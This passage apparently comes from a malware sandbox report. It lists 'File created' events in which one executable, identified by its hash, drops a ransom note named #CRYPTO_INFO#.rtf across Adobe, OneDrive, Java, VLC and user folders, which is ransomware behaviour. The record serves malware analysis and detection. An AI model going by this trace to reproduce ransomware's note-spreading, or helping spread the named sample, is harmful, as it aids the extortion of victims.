DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\te\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\zh-TW\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\Saved Games\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\gd\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jre1.8.0_66\bin\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\PenWorkspace\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Microsoft Office 15\ClientX64\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\lb-LU\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\db\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\ProgramData\Oracle\Java\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Mozilla Firefox\browser\features\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\HoloItemPlayerApp_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\yo-NG\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\el\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\P39BCN79\2\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\xh-ZA\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\hrtfs\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sl-sl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\quz-PE\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\http\requests\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\tool\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\gu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\locale\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\et\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app-api\dev\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Controls\Styles\Flat\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nb-NO\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\DC\Security\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\OneDrive\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Public\Libraries\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\pt-BR\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ar\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created 